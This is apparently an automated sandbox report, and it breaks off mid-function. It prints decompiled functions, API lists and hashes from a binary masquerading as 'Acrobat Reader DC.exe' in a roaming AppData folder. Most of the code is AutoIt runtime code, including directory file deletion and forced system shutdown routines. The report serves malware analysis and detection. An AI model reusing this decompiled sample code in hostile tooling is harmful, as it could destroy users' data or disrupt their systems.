                                  • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                  • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                  • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044BF8B Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044BF8B(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				char _v1044;
				char _v1564;
				struct _WIN32_FIND_DATAW _v2156;
				short _v2684;
				char _v2692;
				char _v2693;
				void* _t29;
				char _t48;
				void* _t65;
				signed int _t68;
				void* _t71;
				void* _t72;

				_v2693 = 0;
				E00410120( &_v2684, _a4, __edx);
				_t29 = E00433998( &_v2684);
				_t71 = (_t68 & 0xfffffff8) - 0xa88 + 4;
				if(_t29 != 0) {
					E00411536( &_v2684, L"\\*.*");
					_t71 = _t71 + 8;
				}
				E00413A0E( &_v2684,  &_v2692,  &_v1564,  &_v524,  &_v1044);
				_t72 = _t71 + 0x14;
				_t65 = FindFirstFileW( &_v2684,  &_v2156);
				_t48 = 1;
				if(_t65 == 0xffffffff) {
					L9:
					FindClose(_t65);
					return _v2693;
				} else {
					while(_t48 == 1) {
						if((_v2156.dwFileAttributes & 0x00000010) != 0) {
							L6:
							if(FindNextFileW(_t65,  &_v2156) == 0) {
								_t48 = 0;
							}
							continue;
						} else {
							_v2693 = _t48;
							E00411567( &_v2684,  &_v2692);
							E00411536( &_v2684,  &_v1564);
							E00411536( &_v2684,  &(_v2156.cFileName));
							_t72 = _t72 + 0x18;
							if(DeleteFileW( &_v2684) != 1) {
								FindClose(_t65);
								return 0;
							} else {
								goto L6;
							}
						}
						goto L10;
					}
					goto L9;
				}
				L10:
			}
















                                  0x0044bfa0
                                  0x0044bfa5
                                  0x0044bfaf
                                  0x0044bfb4
                                  0x0044bfb9
                                  0x0044bfc5
                                  0x0044bfca
                                  0x0044bfca
                                  0x0044bfef
                                  0x0044bff4
                                  0x0044c00a
                                  0x0044c00c
                                  0x0044c011
                                  0x0044c092
                                  0x0044c093
                                  0x0044c0a2
                                  0x0044c013
                                  0x0044c013
                                  0x0044c020
                                  0x0044c06c
                                  0x0044c07d
                                  0x0044c07f
                                  0x0044c07f
                                  0x00000000
                                  0x0044c022
                                  0x0044c02c
                                  0x0044c030
                                  0x0044c042
                                  0x0044c054
                                  0x0044c059
                                  0x0044c06a
                                  0x0044c084
                                  0x0044c091
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044c06a
                                  0x00000000
                                  0x0044c020
                                  0x00000000
                                  0x0044c013
                                  0x00000000

                                  APIs
                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,0040F545,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,004A90E8,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,?,0040F545), ref: 0041013C
                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                  • _wcscat.LIBCMT ref: 0044BFC5
                                  • __wsplitpath.LIBCMT ref: 0044BFEF
                                  • FindFirstFileW.KERNEL32(?,?), ref: 0044C004
                                  • _wcscpy.LIBCMT ref: 0044C030
                                  • _wcscat.LIBCMT ref: 0044C042
                                  • _wcscat.LIBCMT ref: 0044C054
                                  • DeleteFileW.KERNEL32(?), ref: 0044C061
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044C075
                                  • FindClose.KERNEL32(00000000), ref: 0044C084
                                  • FindClose.KERNEL32(00000000), ref: 0044C093
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: FileFind$_wcscat$Close$AttributesDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                  • String ID: \*.*
                                  • API String ID: 3771809977-1173974218
                                  • Opcode ID: ed66a4a5c2d47a5941d3310c8672dc2671f9469612d4f27da2b7748a55e83c30
                                  • Instruction ID: a80060c485f0c376bb4167ae0b00d0fca8fe69e194215be70a311f08e499f8fe
                                  • Opcode Fuzzy Hash: ed66a4a5c2d47a5941d3310c8672dc2671f9469612d4f27da2b7748a55e83c30
                                  • Instruction Fuzzy Hash: 3B31C472409300AAC720DFA0DC84ADFB7DCAF99314F444E1EFA8982151EB38D24887A7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E004333BE(int _a4, intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				int _t27;
				int _t29;
				int _t31;

				_t29 = _a4;
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8) == 0) {
					L2:
					return 0;
				} else {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v24.Privileges));
					_v24.PrivilegeCount = 1;
					_v12 = 2;
					AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
					if(GetLastError() == 0) {
						if(_t29 == 0x20) {
							return SetSystemPowerState(1, 0);
						} else {
							if(_t29 == 0x40) {
								return SetSystemPowerState(0, 0);
							} else {
								if((_t29 & 0x0000000b) != 0) {
									_t31 = 0;
									if((_t29 & 0x00000014) != 0) {
										_t31 = 1;
									}
									_t27 = 0;
									if((_t29 & 0x00000002) != 0) {
										_t27 = 1;
									}
									__imp__InitiateSystemShutdownExW(0, 0, 0, _t31, _t27, _a8);
									return _t27;
								} else {
									return ExitWindowsEx(_t29, 0);
								}
							}
						}
					} else {
						goto L2;
					}
				}
			}









                                  0x004333c5
                                  0x004333dd
                                  0x0043341e
                                  0x00433424
                                  0x004333df
                                  0x004333ea
                                  0x00433400
                                  0x00433407
                                  0x0043340e
                                  0x0043341c
                                  0x00433428
                                  0x00433483
                                  0x0043342a
                                  0x0043342d
                                  0x00433492
                                  0x0043342f
                                  0x00433432
                                  0x00433442
                                  0x00433447
                                  0x00433449
                                  0x00433449
                                  0x0043344e
                                  0x00433453
                                  0x00433455
                                  0x00433455
                                  0x00433466
                                  0x00433470
                                  0x00433434
                                  0x00433441
                                  0x00433441
                                  0x00433432
                                  0x0043342d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043341c

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                  • GetLastError.KERNEL32 ref: 00433414
                                  • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                  • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                  • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                  • String ID: SeShutdownPrivilege
                                  • API String ID: 2938487562-3733053543
                                  • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                  • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                  • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                  • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0041A208(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x490d40; // 0x7c4adafd
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x497278 = _t6;
				 *0x497274 = _t22;
				 *0x497270 = _t25;
				 *0x49726c = _t21;
				 *0x497268 = _t27;
				 *0x497264 = _t26;
				 *0x497290 = ss;
				 *0x497284 = cs;
				 *0x497260 = ds;
				 *0x49725c = es;
				 *0x497258 = fs;
				 *0x497254 = gs;
				asm("pushfd");
				_pop( *0x497288);
				 *0x49727c =  *_t31;
				 *0x497280 = _v0;
				 *0x49728c =  &_a4;
				 *0x4971c8 = 0x10001;
				 *0x49717c =  *0x497280;
				 *0x497170 = 0xc0000409;
				 *0x497174 = 1;
				_t12 =  *0x490d40; // 0x7c4adafd
				_v812 = _t12;
				_t13 =  *0x490d44; // 0x83b52502
				_v808 = _t13;
				 *0x4971c0 = IsDebuggerPresent();
				_push(1);
				E0041FE19(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter("pqI");
				if( *0x4971c0 == 0) {
					_push(1);
					E0041FE19(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}


















                                  0x0041a208
                                  0x0041a208
                                  0x0041a208
                                  0x0041a208
                                  0x0041a208
                                  0x0041a208
                                  0x0041a208
                                  0x0041a20e
                                  0x0041a210
                                  0x0041a210
                                  0x00421f11
                                  0x00421f16
                                  0x00421f1c
                                  0x00421f22
                                  0x00421f28
                                  0x00421f2e
                                  0x00421f34
                                  0x00421f3b
                                  0x00421f42
                                  0x00421f49
                                  0x00421f50
                                  0x00421f57
                                  0x00421f5e
                                  0x00421f5f
                                  0x00421f68
                                  0x00421f70
                                  0x00421f78
                                  0x00421f83
                                  0x00421f92
                                  0x00421f97
                                  0x00421fa1
                                  0x00421fab
                                  0x00421fb0
                                  0x00421fb6
                                  0x00421fbb
                                  0x00421fc7
                                  0x00421fcc
                                  0x00421fce
                                  0x00421fd6
                                  0x00421fe1
                                  0x00421fee
                                  0x00421ff0
                                  0x00421ff2
                                  0x00421ff7
                                  0x0042200b

                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                  • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                  • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID: pqI
                                  • API String ID: 2579439406-2459173057
                                  • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                  • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                  • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                  • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E004417BF(intOrPtr _a4, struct HWND__** _a8) {
				signed int _v32;
				long _v36;
				struct tagRECT _v52;
				struct tagRECT _v68;
				void* _v72;
				WCHAR* _v76;
				struct HBRUSH__* _v80;
				long _v84;
				int _v88;
				long _v92;
				int _v96;
				void* _v100;
				void* __edi;
				void* __esi;
				signed int _t104;
				long _t106;
				long _t108;
				long _t111;
				void* _t113;
				WCHAR* _t127;
				struct HBRUSH__* _t160;
				signed int _t168;
				struct HWND__** _t169;
				int _t170;
				WCHAR* _t171;
				signed int _t191;
				struct HDC__* _t213;
				intOrPtr _t217;
				void* _t219;

				_t217 = _a4;
				if( *0x49751c == 0) {
					_t104 =  *(_t217 + 0x10);
					_t213 =  *(_t217 + 0x18);
					_t168 = _t104 & 0x00000006;
					_v52.right = _t104 & 0x00000010;
					_v32 = _t168;
					_v52.top.left = _t104 & 0x00000001;
					__eflags = _t168;
					if(_t168 == 0) {
						_t106 = _a8[0x12];
						__eflags = _t106 - 0xffffffff;
						if(_t106 == 0xffffffff) {
							_t106 = GetSysColor(0x12);
							goto L6;
						}
					} else {
						_t106 = GetSysColor(0xe);
						L6:
					}
					_v52.top.left = SetTextColor(_t213, _t106);
					_t108 = _a8[0x11];
					__eflags = _t108 - 0xffffffff;
					if(_t108 != 0xffffffff) {
						_v68.top.left = CreateSolidBrush(_t108);
						_t111 = _a8[0x11];
					} else {
						_v68.right.left = GetSysColorBrush(0xf);
						_t111 = GetSysColor(0xf);
					}
					_v52.right = SetBkColor(_t213, _t111);
					_t113 = SelectObject(_t213, _v72);
					__eflags = _v76;
					_v68.bottom = _t113;
					_v52.top.left =  *(_t217 + 0x1c);
					_v52.right =  *(_t217 + 0x20);
					_v52.bottom =  *(_t217 + 0x24);
					_v36 =  *(_t217 + 0x28);
					if(_v76 == 0) {
						__eflags = _v72;
						if(_v72 != 0) {
							InflateRect( &(_v52.top), 0xffffffff, 0xffffffff);
						}
						DrawFrameControl(_t213,  &(_v52.top), 4, 0x10);
					} else {
						InflateRect( &(_v52.top), 0xffffffff, 0xffffffff);
						_t160 = CreateSolidBrush(GetSysColor(0x10));
						_v68.left = _t160;
						FrameRect(_t213,  &_v52, _t160);
						DeleteObject(_v68.left);
					}
					__eflags = _v76;
					_v52.top.left =  *(_t217 + 0x1c);
					_v52.right =  *(_t217 + 0x20);
					_v52.bottom =  *(_t217 + 0x24);
					_v36 =  *(_t217 + 0x28);
					if(_v76 == 0) {
						__eflags = _v72;
						if(_v72 == 0) {
							InflateRect( &(_v52.top), 0xfffffffe, 0xfffffffe);
						} else {
							InflateRect( &(_v52.top), 0xfffffffd, 0xfffffffd);
						}
						_v52.top.left = _v52.top.left - 1;
						_t51 =  &(_v52.right);
						 *_t51 = _v52.right - 1;
						__eflags =  *_t51;
					} else {
						InflateRect( &(_v52.top), 0xfffffffe, 0xfffffffe);
					}
					FillRect(_t213,  &(_v52.top), _v80);
					__eflags = _v88;
					if(_v88 != 0) {
						L23:
						_v68.right.left = _v68.right.left + 2;
						_t58 =  &(_v68.bottom);
						 *_t58 = _v68.bottom + 2;
						__eflags =  *_t58;
					} else {
						__eflags = _t168;
						if(_t168 != 0) {
							goto L23;
						}
					}
					_t169 = _a8;
					_v88 = 0x105;
					__eflags = GetWindowLongW( *_t169, 0xfffffff0) & 0x00002000;
					if(__eflags == 0) {
						_v88 = 0x125;
					}
					_t65 = SendMessageW( *_t169, 0xe, 0, 0) + 1; // 0x1
					_t170 = _t65;
					_push( ~(0 | __eflags > 0x00000000) | _t170 * 0x00000002);
					_t127 = E004115D7(_t213, _t217, __eflags);
					_v76 = _t127;
					GetWindowTextW( *_a8, _t127, _t170);
					_t171 = _v76;
					DrawTextW(_t213, _t171, 0xffffffff,  &(_v68.right), _v88);
					__eflags = _v72;
					if(_v72 != 0) {
						_v52.left =  *(_t217 + 0x24);
						_t191 =  *(_t217 + 0x20) + 1;
						__eflags = _t191;
						_v52.top.left =  *(_t217 + 0x28);
						_v68.right.left =  *(_t217 + 0x1c) + 1;
						_v68.bottom = _t191;
						SetTextColor(_t213, GetSysColor(0x11));
						DrawTextW(_t213, _t171, 0xffffffff,  &_v68, _v96);
					}
					__eflags = _v84;
					if(_v84 != 0) {
						_v68.right.left =  *(_t217 + 0x1c);
						_v68.bottom =  *(_t217 + 0x20);
						_v52.left =  *(_t217 + 0x24);
						_v52.top.left =  *(_t217 + 0x28);
						_t219 = CreateSolidBrush(0);
						FrameRect(_t213,  &(_v68.top), _t219);
						DeleteObject(_t219);
						InflateRect( &_v68, 0xfffffffc, 0xfffffffc);
						DrawFocusRect(_t213,  &_v68);
					}
					_push(_t171);
					E004111DC();
					SelectObject(_t213, _v68);
					DeleteObject(_v100);
					SetTextColor(_t213, _v92);
					SetBkColor(_t213, _v84);
					return 1;
				} else {
					return E004308EF(_t217, _a8);
				}
			}
































                                  0x004417d1
                                  0x004417d5
                                  0x004417ea
                                  0x004417ed
                                  0x004417f4
                                  0x004417fd
                                  0x00441801
                                  0x00441805
                                  0x00441809
                                  0x0044180b
                                  0x00441814
                                  0x00441817
                                  0x0044181a
                                  0x0044181e
                                  0x00000000
                                  0x0044181e
                                  0x0044180d
                                  0x0044181e
                                  0x0044181e
                                  0x0044181e
                                  0x0044182f
                                  0x00441833
                                  0x00441836
                                  0x00441839
                                  0x00441858
                                  0x0044185f
                                  0x0044183b
                                  0x00441845
                                  0x00441849
                                  0x00441849
                                  0x00441870
                                  0x00441874
                                  0x0044187a
                                  0x00441885
                                  0x0044188c
                                  0x00441893
                                  0x00441897
                                  0x0044189b
                                  0x0044189f
                                  0x004418dd
                                  0x004418e2
                                  0x004418ed
                                  0x004418ed
                                  0x004418fd
                                  0x004418a1
                                  0x004418aa
                                  0x004418b9
                                  0x004418c6
                                  0x004418ca
                                  0x004418d5
                                  0x004418d5
                                  0x00441903
                                  0x00441911
                                  0x00441918
                                  0x0044191c
                                  0x00441920
                                  0x00441924
                                  0x00441937
                                  0x0044193c
                                  0x00441952
                                  0x0044193e
                                  0x00441952
                                  0x00441952
                                  0x0044195d
                                  0x00441961
                                  0x00441961
                                  0x00441961
                                  0x00441926
                                  0x0044192f
                                  0x0044192f
                                  0x00441970
                                  0x00441976
                                  0x0044197b
                                  0x00441981
                                  0x00441986
                                  0x0044198a
                                  0x0044198a
                                  0x0044198a
                                  0x0044197d
                                  0x0044197d
                                  0x0044197f
                                  0x00000000
                                  0x00000000
                                  0x0044197f
                                  0x0044198e
                                  0x00441996
                                  0x004419a4
                                  0x004419a9
                                  0x004419ab
                                  0x004419ab
                                  0x004419c2
                                  0x004419c2
                                  0x004419d7
                                  0x004419d8
                                  0x004419e2
                                  0x004419ec
                                  0x004419f6
                                  0x00441a04
                                  0x00441a0a
                                  0x00441a0f
                                  0x00441a1a
                                  0x00441a22
                                  0x00441a22
                                  0x00441a25
                                  0x00441a29
                                  0x00441a2d
                                  0x00441a39
                                  0x00441a4d
                                  0x00441a4d
                                  0x00441a53
                                  0x00441a58
                                  0x00441a63
                                  0x00441a6c
                                  0x00441a70
                                  0x00441a74
                                  0x00441a7e
                                  0x00441a87
                                  0x00441a8e
                                  0x00441a9d
                                  0x00441aa9
                                  0x00441aa9
                                  0x00441aaf
                                  0x00441ab0
                                  0x00441abe
                                  0x00441ac9
                                  0x00441ad5
                                  0x00441ae1
                                  0x00441af2
                                  0x004417d7
                                  0x004417e7
                                  0x004417e7

                                  APIs
                                  • GetSysColor.USER32(00000012), ref: 0044181E
                                  • SetTextColor.GDI32(?,?), ref: 00441826
                                  • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                  • GetSysColor.USER32(0000000F), ref: 00441849
                                  • SetBkColor.GDI32(?,?), ref: 00441864
                                  • SelectObject.GDI32(?,?), ref: 00441874
                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                  • GetSysColor.USER32(00000010), ref: 004418B2
                                  • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                  • FrameRect.USER32 ref: 004418CA
                                  • DeleteObject.GDI32(?), ref: 004418D5
                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                  • FillRect.USER32 ref: 00441970
                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                    • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                    • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                    • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                    • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                    • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                    • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                    • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                    • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                    • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                  • String ID:
                                  • API String ID: 69173610-0
                                  • Opcode ID: 5c7baab47335ee5217a2594bda53402e6f588749cb574737a0127628a3c9064f
                                  • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                  • Opcode Fuzzy Hash: 5c7baab47335ee5217a2594bda53402e6f588749cb574737a0127628a3c9064f
                                  • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 57%
                                  			E00403A20(char* __ecx, void* __edx, void* __fp0, char _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8196;
				void* __ebx;
				void* __edi;
				signed int _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t64;
				signed int _t65;
				void* _t67;
				intOrPtr _t68;
				signed int _t72;
				intOrPtr _t76;
				signed int _t86;
				char* _t96;
				intOrPtr _t101;
				void* _t116;
				intOrPtr* _t117;
				void* _t119;
				short* _t120;
				signed int _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t134 = __fp0;
				_t98 = __ecx;
				E00422240(0x2004);
				_t120 = _a4;
				if( *_t120 == 0x23) {
					_t96 = __ecx;
					_t44 = E0041341F(_t120, L"#notrayicon", 0xb);
					_t124 = _t123 + 0xc;
					__eflags = _t44;
					if(_t44 != 0) {
						_t45 = E0041341F(_t120, L"#requireadmin", 0xd);
						_t125 = _t124 + 0xc;
						__eflags = _t45;
						if(_t45 != 0) {
							_t46 = E0041341F(_t120, L"#NoAutoIt3Execute", 0xd);
							_t126 = _t125 + 0xc;
							__eflags = _t46;
							if(_t46 != 0) {
								_t47 = E0041341F(_t120, L"#OnAutoItStartRegister", 0x16);
								_t127 = _t126 + 0xc;
								__eflags = _t47;
								if(__eflags != 0) {
									_t48 = E0041341F(_t120, L"#include-once", 0xd);
									_t128 = _t127 + 0xc;
									__eflags = _t48;
									if(_t48 != 0) {
										_t49 = E0041341F(_t120, L"#include", 8);
										_t129 = _t128 + 0xc;
										__eflags = _t49;
										if(_t49 != 0) {
											_t50 = E0041341F(_t120, L"#comments-start", 0xf);
											_t130 = _t129 + 0xc;
											__eflags = _t50;
											if(__eflags == 0) {
												L28:
												_t117 = _a12;
												_a4 = 1;
												while(1) {
													__eflags = E0046FD6C(__eflags, _a16, _t120);
													if(__eflags == 0) {
														break;
													}
													 *_t117 =  *_t117 + 1;
													E00444BBB(_t98, __eflags, _t120);
													E00444B5F(_t98, _t120);
													_t58 = E0041341F(_t120, L"#comments-start", 0xf);
													_t130 = _t130 + 0xc;
													__eflags = _t58;
													if(__eflags == 0) {
														L36:
														_a4 = _a4 + 1;
														continue;
													}
													_t59 = E0041341F(_t120, L"#cs", 3);
													_t130 = _t130 + 0xc;
													__eflags = _t59;
													if(__eflags == 0) {
														goto L36;
													}
													_t60 = E0041341F(_t120, L"#comments-end", 0xd);
													_t130 = _t130 + 0xc;
													__eflags = _t60;
													if(_t60 == 0) {
														L34:
														_t62 = _a4 - 1;
														_a4 = _t62;
														__eflags = _t62;
														if(__eflags > 0) {
															continue;
														}
														return 1;
													}
													_t64 = E0041341F(_t120, L"#ce", 3);
													_t130 = _t130 + 0xc;
													__eflags = _t64;
													if(__eflags != 0) {
														continue;
													}
													goto L34;
												}
												__eflags = _a4;
												if(__eflags <= 0) {
													L5:
													return 1;
												}
												E00454014(__eflags, _t134, _t96, _a8,  *_t117, L"Unterminated group of comments", _t120);
												return 0;
											}
											_t65 = E0041341F(_t120, L"#cs", 3);
											_t130 = _t130 + 0xc;
											__eflags = _t65;
											if(__eflags != 0) {
												goto L5;
											}
											goto L28;
										}
										_push( &_v8196);
